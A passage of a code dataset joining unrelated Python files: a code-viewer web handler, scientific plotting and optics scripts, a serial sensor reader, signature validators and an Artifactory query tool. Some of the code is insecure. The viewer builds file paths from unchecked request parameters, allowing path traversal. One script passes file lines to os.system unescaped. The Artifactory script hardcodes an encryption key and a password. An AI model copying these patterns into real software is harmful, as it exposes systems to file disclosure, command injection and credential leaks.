Can be absolute or relative path.\n\n \"\"\"\n if os.path.isfile(model):\n abs_model = model\n elif os.path.isfile(self.overlay_dirname + \"/\" + model):\n abs_model = self.overlay_dirname + \"/\" + model\n else:\n raise ValueError(\n \"File {} does not exist.\".format(model))\n if not os.path.isdir(XCL_DST_PATH):\n raise ValueError(\n \"Folder {} does not exist.\".format(XCL_DST_PATH))\n\n if not model.endswith(\".xmodel\"):\n raise RuntimeError(\"Currently only xmodel files can be loaded.\")\n else:\n self.graph = xir.Graph.deserialize(abs_model)\n subgraphs = get_child_subgraph_dpu(self.graph)\n assert len(subgraphs) == 1\n self.runner = vart.Runner.create_runner(subgraphs[0], \"run\")\n","sub_path":"pynq_dpu/dpu.py","file_name":"dpu.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"616950455","text":"import re\nfrom subprocess import Popen, PIPE\n \nprjRoot = \"/home/beonit/work/\"\n\n# http://localhost/codeview/index.py/get_file?prj=android-platform&filename=system/core/Android.mk&linnum=1\ndef get_file(req):\n info = req.form\n prj = info.get('prj', None)\n if prj is None:\n return \"errno 0 : prj is none\"\n filename = info.get('filename', None)\n if filename is None:\n return \"errno 1\"\n linnum = info.get('linnum', '0')\n fileHandle = file( prjRoot + prj + \"/\" + filename )\n out = \"\"\n for line in fileHandle:\n out += line\n return out\n\n# http://localhost/codeview/index.py/get_file_list?prj=android-platform&path=frameworks/base/core\ndef get_file_list(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n path = info.get( 'path', None )\n if path is None:\n return \"errno 1 : path is noen\"\n out = \"\"\n os.chdir( prjRoot + prj + \"/\" + path )\n f = os.popen(\"find -type f -maxdepth 1\")\n out = \"\"\n for line in f.readlines():\n out += line[2:]\n return out\n\n# http://localhost/codeview/index.py/get_dir_list?prj=android-platform&path=frameworks/base/core\ndef get_dir_list(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n path = info.get( 'path', None )\n if path is None:\n return \"errno 1 : path is noen\"\n out = \"\"\n os.chdir( prjRoot + prj + \"/\" + path )\n f = os.popen(\"ls -d */\")\n out = \"\"\n for line in f.readlines():\n out += line[:-2] + \"\\n\"\n return out\n\n# http://localhost/codeview/index.py/cscope?prj=android-platform&method=-1&query=shutdown\ndef cscope(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n method = info.get( 'method', None )\n if method is None:\n return \"errno 1 : method is empty\"\n query = info.get( 'query', None )\n if query is None:\n return \"errno 2 : query is empty\"\n\n dbfile = prjRoot + prj + \"/cscope.out\"\n proc = Popen([\"cscope\", \"-dL\", \"-f\", dbfile, method, query],\n stdin=PIPE,\n stdout=PIPE,\n cwd=prjRoot+prj)\n out = \"\"\n for line in proc.stdout.readlines():\n out += line\n return out\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91001444","text":"import cmaps as cmps\r\nimport numpy as np\r\nimport xarray as xr\r\nimport matplotlib.pyplot as plt\r\nimport cartopy.crs as ccrs\r\nimport cartopy.feature as cfeat\r\n\r\nfrom cartopy.util import 
add_cyclic_point\r\nfrom shapely.geometry.polygon import Polygon\r\nfrom sklearn.feature_selection import f_regression\r\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\r\n\r\nimport sys\r\nsys.path.append(\"../utils/\")\r\n\r\nfrom mon2season import Month_to_Season\r\nfrom lonFlip import lonFlip_EW, lonFlip_360\r\nfrom tibet_shp_load import tibet_shp_load\r\nfrom tnflux import tnflux\r\nfrom draw_polar_steoro import draw_north_polar_steoro\r\nfrom Linear_Regression_dim import Linear_Regression_dim\r\n\r\nmylev = 200\r\n\r\nsic_idx = np.loadtxt(\"../sic-idx/idx-filter.txt\")\r\n#sic_idx = np.loadtxt(\"../test/myidx.txt\")\r\n\r\ndsz = xr.open_dataset('../data/hgt.mon.mean.nc')\r\ndsu = xr.open_dataset('../data/uwnd.mon.mean.nc')\r\ndsv = xr.open_dataset('../data/vwnd.mon.mean.nc')\r\ndst = xr.open_dataset('../data/air.mon.mean.nc')\r\n\r\nyear_start = 1979\r\nyear_end = 2020\r\nyear = range(year_start, year_end)\r\n\r\ndsz = lonFlip_EW(dsz)\r\ndsu = lonFlip_EW(dsu)\r\ndsv = lonFlip_EW(dsv)\r\n\r\nhgt = dsz['hgt'].loc[:,200,:0,:]\r\nlat = dsz['lat'].loc[:0]\r\nlon = dsz['lon']\r\n\r\nuwnd = dsu['uwnd'].loc[:,200,:0,:]\r\nvwnd = dsv['vwnd'].loc[:,200,:0,:]\r\n\r\nuwnd_son = Month_to_Season(uwnd, \"SON\", \"ave\", year_start, year_end)\r\nvwnd_son = Month_to_Season(vwnd, \"SON\", \"ave\", year_start, year_end)\r\n\r\nu_c = uwnd_son.mean(dim=\"time\")\r\nv_c = vwnd_son.mean(dim=\"time\")\r\n\r\nfor myseason in [\"SON\",\"OND\",\"NDJ\"]:\r\n\tss = lonFlip_EW(xr.open_dataset(\"CP-%s.nc\" % myseason))\r\n\tck = ss['__xarray_dataarray_variable__']\r\n\r\n\r\n\thgt_son = Month_to_Season(hgt, myseason, \"ave\", year_start, year_end)\r\n\tuwnd_son = Month_to_Season(uwnd, myseason, \"ave\", year_start, year_end)\r\n\tvwnd_son = Month_to_Season(vwnd, myseason, \"ave\", year_start, year_end)\r\n\t\r\n\thgt_reg, reg_sig = Linear_Regression_dim(hgt_son, sic_idx, 0)\r\n\thgt_reg_xr = xr.DataArray(hgt_reg,coords=[(\"lat\",lat.values),(\"lon\",lon.values)])\r\n\treg_sig_xr = xr.DataArray(reg_sig,coords=[(\"lat\",lat.values),(\"lon\",lon.values)])\r\n\t\r\n\tFx, Fy = tnflux(u_c, v_c, hgt_reg_xr, mylev, lat, lon, 0.01)\r\n\t\r\n\tFx.loc[11:,:] = np.nan\r\n\tFy.loc[11:,:] = np.nan\r\n\t\r\n\ttibet_shp = tibet_shp_load(\"../utils/tibet_shape\")\r\n\t\r\n\t# plot var\r\n\t\r\n\tplt.close\r\n\t\r\n\tck, lon1 = add_cyclic_point(ck, coord=lon)\r\n\t\r\n\tFx, lonFx = add_cyclic_point(Fx, coord=lon)\r\n\tFy, lonFy = add_cyclic_point(Fy, coord=lon)\r\n\t\r\n\tfig, ax = draw_north_polar_steoro(10)\r\n\t\r\n\tlevels = np.linspace(-5,5,21)\r\n\t\r\n\tim = ax.contourf(lon1, lat, ck, levels=levels, cmap=cmps.BlueWhiteOrangeRed, transform=ccrs.PlateCarree(), extend=\"both\")\r\n\t\r\n\tcb = plt.colorbar(im, orientation='horizontal', ticks=levels[::2], shrink=0.8)\r\n\tcb.ax.tick_params(labelsize=18)\r\n\t\t\r\n\tpgon = Polygon(tibet_shp)\r\n\tax.add_geometries([pgon], crs=ccrs.PlateCarree(), facecolor=\"none\", edgecolor='black', linewidth=1.0)\r\n\t\r\n\t# plot wave activity flux\r\n\tfontproperties = {\"size\":14}\r\n\twaf = ax.quiver(lonFx[::2], lat[::2], Fx[::2,::2], Fy[::2,::2], transform=ccrs.PlateCarree(), pivot='mid', width=0.0018, scale=2.0, headwidth=4)\r\n\twaf_key = ax.quiverkey(waf, 0.85, -0.13, 0.20, \"0.20\", color=\"black\", fontproperties=fontproperties)\r\n\t\r\n\tfig.show()\r\n\tfig.savefig(\"waf-cp-%s.png\" % myseason, dpi=1000)\r\n\t\r\n\tprint(\"%s\" % 
myseason)\r\n\t\r\n","sub_path":"气候诊断/example/CP和Wave-Activity-Flux叠加.py","file_name":"CP和Wave-Activity-Flux叠加.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"198607867","text":"# -*- coding: utf-8 -*-\r\nimport os,sh\r\nos.chdir('/home/userroot/ncbi/public/sra/')\r\nlistSra = open('./SRR_Acc_List.txt')\r\nall_lines = listSra.readlines()\r\nfor line in all_lines:\r\n print (line)\r\n os.system('prefetch %s' %(line))\r\n os.system('fastq-dump %s' %(line))\r\nlistSra.close()\r\n","sub_path":"python/sra_prefetch.py","file_name":"sra_prefetch.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"367025202","text":"#!/usr/bin/env python\nimport time\nimport serial\n\nser = serial.Serial(\n port='/dev/dm1_front',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n )\ncounter=0\n#while 1:\n# x=ser.read(5)\n# x=x.replace('R','1')\n# y=int(x)\n# c=y-1006\n# print c*2.5+20\n\ndef dm_1():\n ser.write('Write counter: %d \\n'%(counter))\n x=ser.read(5)\n #x=x.replace('R','1')\n y =int(x[1:4])\n c=y-1008\n d = c*2.5+25\n return y\n","sub_path":"makhnyov/com_distance_sensor1.py","file_name":"com_distance_sensor1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"244670311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 11:56:47 2017\n\n@author: Mic\n\n- It works\n- leaving it as is: pTan in EllipticalMirror still needs fixing, and therefore VersosNorm too\n- leaving it as is: there is still the endless mix-up between XYCentre and XYCentre, XYF1 and XYF1\n\n\n\"\"\"\nimport importlib\nimport numpy as np\n\nimport wiselib2.Rayman as rm\nimport wiselib2.Fundation as Fundation\nimport wiselib2.Optics as Optics\nimport wiselib2.ToolLib as tl\nimport csv\nimportlib.reload(Fundation)\nimportlib.reload(Optics)\nimportlib.reload(tl)\nimportlib.reload(rm)\n\nfrom wiselib2.must import *\nfrom wiselib2.Fundation import OpticalElement\n\nprint(__name__)\nif __name__ == '__main__':\n\n tl.Debug.On = True\n # SOURCE\n #------------------------------------------------------------\n Lambda = 5e-9\n Waist0 =60e-6\n s_k = Optics.SourceGaussian(Lambda, Waist0)\n s_pd = Fundation.PositioningDirectives(\n ReferTo = 'absolute', \n XYCentre = [0,0],\n Angle = np.deg2rad(0))\n s = OpticalElement(\n s_k, \n PositioningDirectives = s_pd, \n Name = 'source', IsSource = True)\n\n\n # KB(h)\n #------------------------------------------------------------ \n f1 = 16\n f2 = 4\n kbh_k = Optics.MirrorElliptic(f1 = f1, f2 = f2 , L= 0.4, Alpha = np.deg2rad(2.5))\n kbh_pd = Fundation.PositioningDirectives(\n ReferTo = 'source',\n PlaceWhat = 'upstream focus',\n PlaceWhere = 'centre')\n kbh = OpticalElement(\n kbh_k, \n PositioningDirectives = kbh_pd, \n Name = 'kbh')\n\n \n\n # detector (h)\n #------------------------------------------------------------\n d_k = Optics.Detector(\n L=100e-6, \n AngleGrazing = np.deg2rad(90) )\n d_pd = Fundation.PositioningDirectives(\n ReferTo = 'upstream',\n PlaceWhat = 'centre',\n PlaceWhere = 'downstream focus',\n Distance = 0)\n d = OpticalElement(\n d_k, \n PositioningDirectives = d_pd, \n Name = 'detector')\n\n\n # Beamline assembly\n #------------------------------------------------------------\n t = None\n t = Fundation.BeamlineElements()\n t.Append(s)\n# t.Append(pm1a)\n t.Append(kbh)\n t.Append(d)\n t.RefreshPositions()\n\n\n\n\n #%% Compute the field up to the mirror\n \n t.ComputationSettings.NPools = 1\n t.ComputeFields(s,kbh, Verbose = False)\n \n #%% Plot of the radius of curvature\n plt.figure(1)\n z_ = np.linspace(11,32,1000)\n R_ = s.CoreOptics.RCurvature(z_)\n plot(z_,R_-z_)\n #plot(z_,z_,'-')\n plt.xlabel('z (m)')\n plt.ylabel('R (m)')\n\n#%% Focus Sweep\n\n '''\n The simplest way to think about the focus sweep is:\n - propagate the field up to the mirror (the mirror OWNS a computed field)\n - use the Focus function\n\n '''\n DefocusList = np.linspace(-40e-3, 0e-3, 21)\n DefocusList_mm = DefocusList * 1e3\n\n ResultList, HewList, More = Fundation.FocusSweep(kbh, DefocusList, DetectorSize = 50e-6)\n\n N = len(ResultList)\n \n for Res in ResultList:\n plt.figure()\n plot(abs(Res.Field))\n\n#%%\n \n plt.figure()\n plot(DefocusList_mm, HewList,'.')\n plt.xlabel('defocus (mm)')\n plt.ylabel('Hew')\n \n#%% comparison with the waist\n\n iMin = tl.MinHew(HewList)\n zMin = DefocusList[iMin]\n r = ResultList[iMin].S\n ISym = abs(ResultList[iMin].Field)**2\n ISym = ISym / max(ISym)\n \n (a, x0, sigma) = tl.FitGaussian1d(ISym, r)\n \n plt.figure(1)\n plot(r*1e6,ISym,'g')\n plt.xlabel('um')\n #%%\n plt.figure()\n r2 = np.linspace(-100e-6, 100e-6, 1000)\n ITeo2 = s.CoreOptics.Amplitude(r2,0)**2\n \n \n (a2, x02, sigma2) = tl.FitGaussian1d(ITeo2, r2)\n \n plot(r2*1e6,ITeo2 ,'r')\n plt.xlabel('um')\n\n\n sigma2/sigma\n \n #%% check the value of pi*w0^2/lambda^2/z^2, which I call gamma\n z = f1\n# zRatio = (np.pi * s_k.Waist0**2 / s_k.Lambda/z)**2\n zRatio = s_k.RayleighRange**2/z**2\n g = zRatio * 1e3\n gg = 25/g\n print(g)\n print(gg)\n \n \n #%% try the geometric construction\n \n N = 100\n [Mir_x, Mir_y] = kbh.CoreOptics.GetXY(N)\n\n pOutList = np.zeros(N)\n for (i,x) in enumerate( Mir_x):\n pIn, pOut = kbh_k.TraceRay([0,0], x)\n pOutList[i] = pOut \n \n \n \n \n \n","sub_path":"Examples/uso_Beamline_vero_04_calcolo_campo_diproi_SORGENTE+KB+DETECTOR_DIPROI_Focus_Sweep_Specchio_piano.py","file_name":"uso_Beamline_vero_04_calcolo_campo_diproi_SORGENTE+KB+DETECTOR_DIPROI_Focus_Sweep_Specchio_piano.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"36647821","text":"from collections import OrderedDict\nfrom umsgpack import packb\nimport base64\nimport datetime\nimport dateutil.parser\n\nfrom Cryptodome.Hash import SHA256\n\nfrom libs import Identity\nfrom .exceptions import ValidationError\n\n\ndef verify_sha256(content, providen_hash: bytes):\n \"\"\"verify_sha256\n\n Helper function for SHA256 hash verification\n\n :param content: Any object\n :param providen_hash: hash digest bytestring\n \"\"\"\n\n if type(content) == str:\n content = content.encode()\n elif isinstance(content, dict):\n # Sometimes content is wrongfully decoded beforehand\n content = packb(content)\n return providen_hash == SHA256.new(content).digest()\n\n\ndef validate_timestamped_signature(pubkey: str, _hash: bytes, signature: dict):\n \"\"\"validate_timestamped_signature\n\n Validates a timestamped signature.\n\n :param pubkey: User's public key\n :param _hash: Provided hash.\n :param signature: Signature to verify, decoded msgpack object\n \"\"\"\n\n identity = Identity(pubkey)\n\n sign = signature['signature']\n timestamp = signature['timestamp']\n\n validator_map = OrderedDict()\n validator_map['timestamp'] = timestamp\n 
validator_map['messageHash'] = base64.b64encode(_hash)\n\n validator = packb(validator_map)\n\n if not identity.verify(validator, sign):\n raise ValidationError('Invalid sign')\n\n\ndef validate_objects(sender_pubkey, objects=[]):\n \"\"\"validate_objects\n\n Validates all the objects received with a message\n\n :param sender_pubkey: User's public key\n :param objects: Object list\n \"\"\"\n # For each container\n for _object in objects:\n\n # If an objectContainer is present\n container = _object.get('objectContainer')\n container_hash = _object.get('objectHash')\n if container:\n # Validate container hash (raise instead of discarding the result)\n if not verify_sha256(container, container_hash):\n raise ValidationError('Invalid hash')\n\n # Validate container signature\n validate_timestamped_signature(\n sender_pubkey, container_hash, _object.get('containerSig'))\n","sub_path":"authorizer/authorizer/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"513874322","text":"import re\nfrom urllib.parse import urljoin\n\nfrom ..schema.nexusphp import AttendanceHR\nfrom ..schema.site_base import Work, SignState\n\n\nclass MainClass(AttendanceHR):\n URL = 'https://1ptba.com/'\n USER_CLASSES = {\n 'downloaded': [805306368000, 3298534883328],\n 'share_ratio': [3.05, 4.55],\n 'days': [280, 700]\n }\n\n def build_workflow(self, entry, config):\n return [\n Work(\n url='/attendance.php',\n method='param',\n succeed_regex=[\n '这是您的第.*?次签到,已连续签到.*?天,本次签到获得.*?魔力值。|這是您的第.*次簽到,已連續簽到.*?天,本次簽到獲得.*?魔力值。',\n '[签簽]到已得\\\\d+',\n '您今天已经签到过了,请勿重复刷新。|您今天已經簽到過了,請勿重複刷新。'],\n check_state=('final', SignState.SUCCEED),\n is_base_content=True\n )\n ]\n\n def sign_in_by_param(self, entry, config, work, last_content=None):\n response = self._request(entry, 'get', work.url)\n if response:\n location_match = re.search('window\\\\.location=\"(.*?);', response.text)\n if location_match:\n uri = re.sub('[\"|+| ]', '', location_match.group(1))\n work.url = urljoin(work.url, uri)\n return self.sign_in_by_get(entry, config, work, last_content)\n else:\n return response\n","sub_path":"ptsites/sites/1ptba.py","file_name":"1ptba.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"535804124","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport unittest\nimport time\n\nfrom datetime import datetime\n\nimport atsd_client\nfrom atsd_client import services\nfrom atsd_client.models import EntityFilter, DateFilter\nfrom atsd_client.models import Message\nfrom atsd_client.models import MessageQuery\nfrom atsd_client import _time_utilities as tu\n\nlogger = logging.getLogger()\nlogger.disabled = True\n\nENTITY = 'pyapi.entity'\nTYPE = 'pyapi.type'\nSOURCE = 'pyapi.source'\nTAG = 'pyapi.tag'\nTAG_VALUE = 'pyapi.tag-value'\nTAGS = {TAG: TAG_VALUE}\nSEVERITY = 'MINOR'\nMESSAGE = 'pyapi test message'\n\n\ndef get_connection():\n conn = atsd_client.connect_url('https://localhost:8443', 'axibase', 'axibase')\n return conn\n\n\nclass TestMessageService(unittest.TestCase):\n def setUp(self):\n self.ms = services.MessageService(\n get_connection()\n )\n\n \"\"\"\n Check parameters were set as expected.\n \"\"\"\n\n def test_fields_match(self):\n DATE = datetime.now()\n m = Message(TYPE, SOURCE, ENTITY, DATE, SEVERITY, TAGS, MESSAGE, persist=False)\n self.assertEqual(TYPE, m.type)\n self.assertEqual(SOURCE, m.source)\n self.assertEqual(ENTITY, m.entity)\n self.assertEqual(tu.to_date(DATE), m.date)\n 
self.assertEqual(SEVERITY, m.severity)\n self.assertEqual(TAGS, m.tags)\n self.assertEqual(MESSAGE, m.message)\n self.assertFalse(m.persist)\n\n \"\"\"\n Check inserted and retrieved messages are equal.\n \"\"\"\n\n def test_insert_retrieve(self):\n DATE = datetime.now()\n msg = Message(TYPE, SOURCE, ENTITY, DATE, SEVERITY, TAGS, MESSAGE)\n self.ms.insert(msg)\n\n time.sleep(2)\n\n ef = EntityFilter(entity=ENTITY)\n df = DateFilter(start_date=DATE, end_date=datetime.now())\n query = MessageQuery(entity_filter=ef, date_filter=df)\n result = self.ms.query(query)\n\n print(result)\n\n self.assertIsNotNone(result)\n self.assertGreater(len(result), 0)\n m = result[0]\n self.assertIsInstance(m, Message)\n \"\"\"\n In the future this may be replaced with:\n self.assertItemsEqual(msg.__dict__.items(), m.__dict__.items())\n \"\"\"\n self.assertEqual(msg.type, m.type)\n self.assertEqual(msg.source, m.source)\n self.assertEqual(msg.entity, m.entity)\n # Uncomment when JodaTime is replaced\n # self.assertEqual(msg.date, m.date)\n self.assertEqual(msg.severity, m.severity)\n self.assertEqual(msg.tags, m.tags)\n self.assertEqual(msg.message, m.message)\n self.assertEqual(msg.persist, m.persist)\n","sub_path":"tests/test_message_service.py","file_name":"test_message_service.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"388265294","text":"name = input(\"Enter name: \")\r\nfriend_name = input(\"Enter friend's name: \")\r\n\r\nif name == friend_name:\r\n friend = input(\"Do you and your friend really have the same name? Type yes or no.\")\r\n friend = str.lower(friend)\r\n if friend == 'yes':\r\n print(\"Having the same name is cool!\")\r\n elif friend == 'no':\r\n friend_name = input(\"Enter another name besides your own: \")\r\n print(\"Your friend's name is\", friend_name + \".\")\r\n else:\r\n print(\"You did not enter yes or no.\")\r\nelse:\r\n print(\"Your friend's name is\", friend_name + \".\")","sub_path":"more on nes-con.py","file_name":"more on nes-con.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"150892080","text":"import xlrd\nimport json\n\n# because of problems with Excel, we save the required data in JSON format\n\nslo_sklad = {'Sklad-3': 3, 'Sklad-7': 7}\nIME_DATOTEKE_S_PODATKI1 = \"ND_00_Seznam klasifikacij po dovoljenjih.xlsx\"\nIME_DATOTEKE_S_PODATKI2 = \"001_Evidenca_odpadko_v_skladiscu.xlsm\"\ndat = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI1)\nlist1 = dat.sheet_by_index(1)\nslo_klas_ste_ime = dict()\nfor i in range(1, 840): # row by row\n kl_st = list1.cell_value(i, 0)\n ime = list1.cell_value(i, 1)\n slo_klas_ste_ime[kl_st] = ime\ndat2 = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI2)\n# so that we can fill the companies table\nlist3 = dat2.sheet_by_index(4)\nslo_id_podjetje = dict() # so that each company's id is stored somewhere\nmn_pod = set()\nst = 1\nfor i in range(1, 334):\n vred = list3.cell_value(i, 1)\n if vred and vred not in {'x', 'X'}:\n pod = vred.upper()\n if pod not in mn_pod:\n # uppercase, because of inconsistent spelling in Excel\n mn_pod.add(pod)\n slo_id_podjetje[pod] = st\n st += 1\ndat = xlrd.open_workbook(IME_DATOTEKE_S_PODATKI2)\n# so that we can fill the companies table\nvhod = dat.sheet_by_index(4) # 334 rows\nslo_opombe = dict()\nsez_podatkov = dict()\nstevec_opombe = 1\nfor i in range(1, 334):\n kl_st = vhod.cell_value(i, 0)\n povzrocitelj = vhod.cell_value(i, 1)\n opomba_uvoz = vhod.cell_value(i, 2)\n teza = vhod.cell_value(i, 3)\n sklad = vhod.cell_value(i, 4)\n datum = vhod.cell_value(i, 5)\n if datum and teza != 1: # weight 1 means an error\n # means the row is not empty\n # convert the date to a SQL-friendly format\n if opomba_uvoz == 'x':\n opomba_uvoz = None\n if opomba_uvoz:\n # if there is at least some data\n opomba_uvoz = opomba_uvoz.upper()\n if opomba_uvoz not in slo_opombe:\n slo_opombe[opomba_uvoz] = stevec_opombe\n stevec_opombe += 1\n if povzrocitelj.upper() in slo_id_podjetje.keys():\n povzrocitelj = slo_id_podjetje[povzrocitelj.upper()]\n else:\n povzrocitelj = None\n if sklad in slo_sklad.keys():\n sklad = slo_sklad[sklad]\n leto, mesec, dan, h, i, s = xlrd.xldate_as_tuple(datum, dat.datemode)\n sql_datum = str(leto) + '-' + str(mesec) + '-' + str(dan)\n teza = int(teza)\n sez_podatkov[(kl_st, teza)] = {'povzrocitelj': povzrocitelj, 'opomba_uvoz': slo_opombe.get(opomba_uvoz), \n 'skladisce': sklad, 'datum_uvoza': sql_datum, 'datum_izvoza': None, 'opomba_izvoz': None}\n # so that export data can be filled in later; entries are keyed by classification number and weight, since these currently do not repeat\nizhod = dat.sheet_by_index(5)\n# 297 rows\nfor i in range(1, 297):\n kl_st = izhod.cell_value(i, 0)\n opomba_izvoz = izhod.cell_value(i, 1)\n teza = izhod.cell_value(i, 2)\n datum_izv = izhod.cell_value(i, 3)\n sklad = izhod.cell_value(i, 4)\n if teza:\n # means the row is not empty\n # convert the date to a SQL-friendly format\n if opomba_izvoz == 'x':\n opomba_izvoz = None\n if opomba_izvoz:\n # if there is at least some data\n opomba_izvoz = opomba_izvoz.upper()\n if opomba_izvoz not in slo_opombe:\n slo_opombe[opomba_izvoz] = stevec_opombe\n stevec_opombe += 1\n leto1, mesec1, dan1, h, i, s = xlrd.xldate_as_tuple(datum_izv, dat.datemode)\n sql_datum1 = str(leto1) + '-' + str(mesec1) + '-' + str(dan1)\n if (kl_st, teza) in sez_podatkov.keys():\n sez_podatkov[kl_st, teza]['datum_izvoza'] = sql_datum1\n sez_podatkov[kl_st, teza]['opomba_izvoz'] = slo_opombe.get(opomba_izvoz)\nslo_opombe['HDPE'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['EKO-2'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['ZOKI-1'] = stevec_opombe\nstevec_opombe += 1\nslo_opombe['OSTALO'] = stevec_opombe\nskup_slo = {'slo_klas_ste_ime': slo_klas_ste_ime, \n 'slo_id_podjetje': slo_id_podjetje,\n 'slo_sklad': slo_sklad,\n 'slo_opombe': slo_opombe}\nvmesni = dict()\nfor i, kl in enumerate(sez_podatkov):\n vmesni[str(i)] = list(kl) + list(sez_podatkov[kl].items())\nskup_slo['sez_podatkov'] = vmesni\nwith open(\"podatki.json\", \"w\") as pisi_podatki:\n json.dump(skup_slo, pisi_podatki)\n\n\n\n\n ","sub_path":"excel_json.py","file_name":"excel_json.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"161700417","text":"'''\nGaussian Density and Gradient\n-------------------------------------\nGaussian_transform: compute the probability density and spatial density gradient based on Gaussian Mixture Model \n'''\nimport math\nimport numpy as np\n\n\ndef Gaussian_transform(S, M, scale):\n m = S.shape[0]\n n = M.shape[0]\n cross_term = 0\n grad = np.zeros((n,2))\n for i in range(n):\n for j in range(m):\n dist_ij = math.exp(-((S[j,0]-M[i,0])*(S[j,0]-M[i,0])+(S[j,1]-M[i,1])*(S[j,1]-M[i,1])) / (scale*scale))\n cross_term += dist_ij/(n*m)\n grad[i] += -dist_ij*2*(S[j]-M[i])/(m*n*scale*scale)\n return cross_term, 
grad\n","sub_path":"_gaussiantransform.py","file_name":"_gaussiantransform.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538169845","text":"#!/usr/bin/python3\nimport json\nimport sys\nfrom cryptography.fernet import Fernet\nfrom artifactory import ArtifactoryPath\nfrom requests.auth import HTTPBasicAuth\n\nkey = b'iwJsebH4vFt8fB6-7k7zZjt6VNLgjjJLl5g1F1B8TVo='\ncipher_suite = Fernet(key)\nciphered_text = b'gAAAAABetXhhcm52CJnfO81tb91Fb_ds3I_bGsoRHOm0H6qFUfPrrvRz_sKJEO2M8ACqBHV-cjrARl18vg-F-liSmNP2oWxSHw=='\nunciphered_text = (cipher_suite.decrypt(ciphered_text))\nunciphered_text = str(unciphered_text,'utf-8')\n#print(unciphered_text)\nunciphered_text=\"thisismycreds\"\n\ntry:\n\n reponame = sys.argv[1]\n #daysdownloaded = sys.argv[2]\n #dayscreated = int(sys.argv[3])\n #print(\"repo: %s downloaded archive days: %s Non-downloaded Artifacts: %s\" % (reponame, daysdownloaded, dayscreated))\n\nexcept:\n print(\"No arguments passed or argument incomplete or invalid argument.\")\n sys.exit()\n\n\naql = ArtifactoryPath(\n \"http://artifactory-test-am2.devops.aig.net/artifactory/\",\n auth=(\"demouser\", unciphered_text),\n auth_type=HTTPBasicAuth,\n)\n\n\n\nargs = [ \n\n\"items.find\",\n\t{ \"repo\": reponame,\n \"$and\": [\n\t\t{\"type\":\"file\"},\n#\t\t{\"created_by\":\"abanzon\"},\n# \t{\"size\":{\"$gt\":\"0\"}}\n# {\"created\": {\"$gt\":\"2020-05-05\"}}\n\t\t]\n\t},\n#sort({\"$desc\": [\"size\",\"name\"]}),\n#limit(100)\n]\n\ntry:\n\n #artifacts_list = aql.aql(*args)\n artifacts_list = aql.aql(*args, \".include\", [\"stat.*\", \"release_artifact.*\", \"dependency.*\", \"artifact.*\", \"archive.*\", \"property.*\"])\n artifact_pathlib = map(aql.from_aql, artifacts_list)\n artifact_pathlib_list = list(map(aql.from_aql, artifacts_list))\n\nexcept:\n\n print(\"Invalid value, please check arguments.\")\n sys.exit()\n\npathlist = []\n\nfor mylist in artifacts_list:\n checkpath = str(mylist['repo'] + \"/\" + mylist['path'])\n if checkpath not in pathlist:\n pathlist.append(checkpath)\n\nfor display in pathlist:\n print(display)\n\n #print(mylist['repo'] + \"/\" + mylist['path'])\n #print(\"###############\")\n #print(mylist['repo'] + \"/\" + mylist['path'] + \" \" + mylist['modified'])\n #print(\"Array 0 HERE\")\n #print (mylist['properties'][0])\n #print(\"Array 1 HERE\")\n #print (mylist['properties'][1])\n #print(\"Array 2 HERE\")\n #print (mylist['properties'][2])\n\n","sub_path":"artifactoryAQL.py","file_name":"artifactoryAQL.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68117715","text":"from country_codes import get_country_code\nimport json\nfrom pygal.maps.world import COUNTRIES\n\nfilename = 'population_data.json'\n\nwith open(filename) as f:\n pop_data = json.load(f)\n\npop_data2010 = []\nfor dictionary in pop_data:\n if dictionary['Year'] == '2010':\n pop_data2010.append(dictionary)\n\n\n#print(len(pop_data2010))\n#print(pop_data2010)\n\npop_temp = []\nfor countries in pop_data2010:\n code = get_country_code(countries['Country Name'])\n if code == None:\n print(countries['Country 